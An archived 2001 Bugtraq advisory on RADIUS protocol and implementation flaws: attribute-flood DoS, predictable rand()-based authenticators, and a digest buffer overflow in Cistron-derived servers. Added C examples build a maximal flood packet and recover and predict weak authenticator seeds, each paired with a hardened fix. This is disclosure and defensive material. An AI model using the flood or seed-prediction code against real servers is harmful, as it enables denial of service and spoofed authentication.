[23121] in bugtraq
More problems with RADIUS (protocol and implementations)
daemon@ATHENA.MIT.EDU (3APA3A)
Tue Nov 13 08:57:10 2001
Date: Tue, 13 Nov 2001 14:50:14 +0300
From: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Reply-To: 3APA3A <3APA3A@SECURITY.NNOV.RU>
Message-ID: <8617320960.20011113145014@SECURITY.NNOV.RU>
To: bugtraq@securityfocus.com
Cc: miquels@cistron.nl, Joshua Hill <josh-radius@untruth.org>
Hello bugtraq,
There are more problems in the RADIUS protocol and in some of its implementations:
1. There is no way a RADIUS server can validate that an Access-Request packet
really originated from the NAS (RADIUS client) before (and even after, if the
packet has no User-Password attribute) decoding all attributes. This opens
the possibility of spoofing the source IP for this kind of packet. I think this
is a major weakness in the RADIUS protocol, rather than all the hard-to-exploit
cryptographic M-i-t-M issues.
Example: according to RFC 2865, each RADIUS packet can be up to 4096
bytes. This allows > 2000 attributes to be put into a single packet. Most
RADIUS server implementations allocate the maximum attribute length for
each attribute, which means > 256 bytes of memory will be allocated for each
attribute. So it's possible to lock > 512K of memory and some CPU time with
a single 4K packet. A nice possibility for DoS.
Attached is a simple flooder that floods a server with packets like this. It
doesn't spoof the source IP, so it can only be used to test your own RADIUS
server (you must use it from an IP registered as a NAS).
2. RFC 2865 requires unpredictability of the authenticator value in the
Authentication Request packet. Many RADIUS server and client library
implementations do not follow it. Many of them have code like
srand(time(0) + getpid()) (or even srand(time(0))) + rand(). As you know,
the number of rand() states is very limited and it's easy to predict the
state of the PRNG. This opens the possibility of spoofing a NAS Authentication
Request. For example, Cistron RADIUS has this flaw in the proxy module. Many
RADIUS client libraries also have this flaw.
3. Most current freeware RADIUS server implementations (and some
commercial ones) are derived from Cistron. And most of them (including
Cistron itself) have a buffer overflow in the digest calculation (in the case
of Cistron itself it's a static data overflow in the calc_acctdigest() function).
This function appends the shared secret to the packet data to calculate the
digest, but space for the shared secret is never allocated in the buffer. If the
packet is exactly of the allocated size (in the case of Cistron it's 1024; they
do not exactly follow the RFC), the string pointer located after the buffer in
memory will be overwritten with the shared secret. Probably this overflow can
only lead to DoS. Since the overflow occurs before the packet is checked, it can
be exploited from a spoofed IP.
--
http://www.security.nnov.ru
/\_/\
{ . . } |\
+--oQQo->{ ^ }<-----+ \
| ZARAZA U 3APA3A }
+-------------o66o--+ /
|/
You know my name - look up my number (The Beatles)
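Added example for point 1, written for this page; it is not code from the original post, from kill_radius.tgz (whose source is not shown here) or from any RADIUS server. It builds the packet shape the post describes, a 4096-byte Access-Request carrying nothing but 2-byte attributes (Type, Length = 2, empty Value), and walks it twice: once with a model of a server that reserves a fixed slot per attribute (the 256-byte slot and the 64-attribute cap are hypothetical figures), and once with a bounded walker that validates lengths, keeps only offsets and drops the packet once the attribute count is absurd.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define RADIUS_HDR_LEN 20   /* Code, Identifier, Length, Request Authenticator */
#define RADIUS_MAX_LEN 4096 /* maximum packet length, RFC 2865 section 3 */
#define ATTR_SLOT 256       /* per-attribute reservation in the naive model (hypothetical) */
#define ATTR_CAP 64         /* upper bound on attributes per request (hypothetical) */
#define MAX_ATTRS (RADIUS_MAX_LEN / 2)

/* Build a maximal Access-Request whose body is nothing but 2-byte attributes
 * (Type, Length = 2, no Value octets).  The Request Authenticator is left as
 * zeros: nothing in it can be checked before the attributes are walked.
 * Returns the packet length, or 0 if the output buffer is too small. */
size_t build_flood_packet(uint8_t *out, size_t cap)
{
    if (cap < RADIUS_MAX_LEN)
        return 0;
    memset(out, 0, RADIUS_MAX_LEN);
    out[0] = 1;                          /* Code 1 = Access-Request */
    out[1] = 0x2a;                       /* Identifier, arbitrary */
    out[2] = RADIUS_MAX_LEN >> 8;        /* Length, network byte order */
    out[3] = RADIUS_MAX_LEN & 0xff;
    size_t off = RADIUS_HDR_LEN;
    while (off + 2 <= RADIUS_MAX_LEN) {
        out[off]     = 1;                /* Type 1 = User-Name; any type will do */
        out[off + 1] = 2;                /* Length 2: empty Value */
        off += 2;
    }
    return off;
}

/* Naive walker: models a server that reserves ATTR_SLOT bytes for every
 * attribute and holds them for the life of the request.  Returns the number
 * of attributes and stores the peak reservation in *reserved. */
size_t walk_naive(const uint8_t *pkt, size_t len, size_t *reserved)
{
    uint8_t *slots[MAX_ATTRS];
    size_t n = 0, off = RADIUS_HDR_LEN;
    *reserved = 0;
    while (off + 2 <= len && n < MAX_ATTRS) {
        uint8_t alen = pkt[off + 1];
        if (alen < 2 || off + alen > len)
            break;                       /* malformed attribute: stop here */
        slots[n] = malloc(ATTR_SLOT);    /* fixed slot regardless of alen */
        if (!slots[n])
            break;
        memcpy(slots[n], pkt + off, alen);
        *reserved += ATTR_SLOT;
        n++;
        off += alen;
    }
    for (size_t i = 0; i < n; i++)       /* a real server frees these much later */
        free(slots[i]);
    return n;
}

/* Bounded walker: checks the header Length, validates every attribute length,
 * keeps only offsets (no copies) and rejects more than ATTR_CAP attributes.
 * Returns the attribute count, or -1 when the packet should be dropped. */
int walk_bounded(const uint8_t *pkt, size_t len)
{
    if (len < RADIUS_HDR_LEN)
        return -1;
    size_t declared = ((size_t)pkt[2] << 8) | pkt[3];
    if (declared < RADIUS_HDR_LEN || declared > len || declared > RADIUS_MAX_LEN)
        return -1;                       /* RFC 2865: too short, or longer than the datagram */
    len = declared;                      /* octets beyond Length are ignored */
    int n = 0;
    size_t off = RADIUS_HDR_LEN;
    while (off < len) {
        if (off + 2 > len)
            return -1;                   /* truncated Type/Length */
        uint8_t alen = pkt[off + 1];
        if (alen < 2 || off + alen > len)
            return -1;                   /* invalid Length */
        if (++n > ATTR_CAP)
            return -1;                   /* the flood case: give up early */
        off += alen;
    }
    return n;
}

int main(void)
{
    uint8_t pkt[RADIUS_MAX_LEN];
    size_t reserved;
    size_t len = build_flood_packet(pkt, sizeof pkt);
    size_t n = walk_naive(pkt, len, &reserved);
    printf("%zu-byte packet, %zu attributes, naive model reserves %zu bytes\n",
           len, n, reserved);
    printf("bounded walker: %d\n", walk_bounded(pkt, len));
    return 0;
}
```

The flood packet carries (4096 - 20) / 2 = 2038 attributes, so the naive model reserves 2038 * 256 bytes for one datagram; the bounded walker rejects it at the 65th attribute without allocating anything. Note that the cap is a policy choice: it must be set above whatever your NAS population legitimately sends.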
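Added example for point 2, written for this page; it is not the Cistron proxy code or any client library's code. It shows the authenticator generator shape the post quotes (srand with a one-second clock, then rand()), the seed-recovery loop an attacker who has seen one Access-Request can run, the follow-on prediction for a client that seeds once and keeps calling rand(), and a replacement that reads /dev/urandom. Function names, the search window and the sample timestamp are all illustrative.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define AUTH_LEN 16

/* Weak generator, the shape the post quotes: srand() with a one-second clock
 * value, so all 16 bytes are a function of a single seed. */
void weak_authenticator(time_t when, uint8_t out[AUTH_LEN])
{
    srand((unsigned)when);
    for (int i = 0; i < AUTH_LEN; i++)
        out[i] = (uint8_t)(rand() & 0xff);
}

/* Attacker side: knowing roughly the sender's clock (and its libc), try every
 * candidate seed around 'guess' until one reproduces the observed value.
 * Returns the seed, or -1 if nothing in the window matches.  For the
 * srand(time(0) + getpid()) variant the same loop runs over about
 * window * 32768 candidates, still a trivial search. */
long recover_seed(const uint8_t observed[AUTH_LEN], time_t guess, int window)
{
    uint8_t trial[AUTH_LEN];
    for (long t = (long)guess - window; t <= (long)guess + window; t++) {
        weak_authenticator((time_t)t, trial);
        if (memcmp(trial, observed, AUTH_LEN) == 0)
            return t;
    }
    return -1;
}

/* With the seed known, a client that seeded once and then draws 16 rand()
 * outputs per request is fully predictable: skip the outputs already used,
 * then read the next authenticator it will put on the wire. */
void predict_next(time_t seed, int requests_already_sent, uint8_t out[AUTH_LEN])
{
    srand((unsigned)seed);
    for (int i = 0; i < requests_already_sent * AUTH_LEN; i++)
        (void)rand();                    /* outputs consumed by earlier requests */
    for (int i = 0; i < AUTH_LEN; i++)
        out[i] = (uint8_t)(rand() & 0xff);
}

/* Replacement: 16 bytes from the kernel CSPRNG.  Returns 0 on success, -1 if
 * /dev/urandom cannot be read, in which case the caller must not send. */
int strong_authenticator(uint8_t out[AUTH_LEN])
{
    FILE *f = fopen("/dev/urandom", "rb");
    if (!f)
        return -1;
    size_t got = fread(out, 1, AUTH_LEN, f);
    fclose(f);
    return got == AUTH_LEN ? 0 : -1;
}

int main(void)
{
    uint8_t seen[AUTH_LEN], next[AUTH_LEN];
    time_t now = time(NULL);
    weak_authenticator(now, seen);               /* what the NAS put on the wire */
    long seed = recover_seed(seen, now + 5, 60); /* attacker's clock is 5 s off */
    printf("recovered seed %ld (actual %ld)\n", seed, (long)now);
    predict_next(seed, 1, next);
    printf("predicted next authenticator: %02x%02x%02x%02x...\n",
           next[0], next[1], next[2], next[3]);
    return 0;
}
```

The recovery loop only needs the attacker and the victim to share a libc rand() implementation, which is why the post's "the number of rand() states is very limited" matters more than the exact seeding formula: every variant collapses to a search over seconds (times PIDs at worst).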
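Added example for point 3, written for this page; it is not Cistron's calc_acctdigest() and the struct layout, field names and 128-bit stand-in hash are hypothetical. It models the shape the post describes (a fixed 1024-byte packet buffer followed in memory by a pointer, with the shared secret appended to the packet bytes before hashing), adds the bounds check that would have refused the 1024-byte packet, and shows the incremental form that never copies the secret at all. MD5 is replaced by FNV-1a so the example has no dependencies; the memory handling is the point, and the same two-update pattern applies to any MD5 API.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PKT_BUF 1024   /* the non-RFC packet buffer size the post mentions for Cistron */

/* Hypothetical storage of the kind point 3 describes: the packet buffer is
 * immediately followed by a pointer, which is what an unchecked append of the
 * secret overwrites when pktlen == PKT_BUF. */
struct request_storage {
    uint8_t     buf[PKT_BUF];
    const char *next_field;   /* stands in for "the string pointer located after the buffer" */
};

/* Stand-in for MD5 (no dependencies): FNV-1a continued from state h, so it
 * can be fed in several pieces exactly like an MD5 update call. */
#define FNV_INIT 14695981039346656037ULL
uint64_t fnv1a_update(uint64_t h, const uint8_t *p, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        h ^= p[i];
        h *= 1099511628211ULL;
    }
    return h;
}

/* Append-then-hash, the vulnerable shape, with the bounds check it lacked.
 * Returns -1 when the secret would not fit in the buffer; that is exactly the
 * pktlen == PKT_BUF case the post describes as overwriting the pointer. */
int digest_append(struct request_storage *rs, size_t pktlen,
                  const char *secret, uint64_t *out)
{
    size_t seclen = strlen(secret);
    if (pktlen > sizeof rs->buf || seclen > sizeof rs->buf - pktlen)
        return -1;                                   /* the missing check */
    memcpy(rs->buf + pktlen, secret, seclen);        /* safe only after it */
    *out = fnv1a_update(FNV_INIT, rs->buf, pktlen + seclen);
    return 0;
}

/* Incremental form: hash the packet bytes, then the secret.  Nothing is
 * copied, so there is nothing to overflow, and it works for every pktlen up
 * to the buffer size, including the 1024-byte packet. */
uint64_t digest_incremental(const uint8_t *pkt, size_t pktlen, const char *secret)
{
    uint64_t h = fnv1a_update(FNV_INIT, pkt, pktlen);
    return fnv1a_update(h, (const uint8_t *)secret, strlen(secret));
}

int main(void)
{
    static struct request_storage rs;
    uint64_t d;
    memset(rs.buf, 0x41, sizeof rs.buf);           /* constructed 1024-byte packet */
    rs.next_field = "unchanged";
    if (digest_append(&rs, PKT_BUF, "s3cret", &d) < 0)
        printf("append form: refused, secret would overwrite next_field\n");
    printf("incremental form: %016llx, next_field still \"%s\"\n",
           (unsigned long long)digest_incremental(rs.buf, PKT_BUF, "s3cret"),
           rs.next_field);
    return 0;
}
```

Because the digest is what authenticates the packet, this code runs before any check on the sender, which is why the post notes the overflow is reachable from a spoofed source address; the bounds check has to come first, not after the digest comparison.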
[Attachment: kill_radius.tgz (application/x-compressed); base64 body not included here]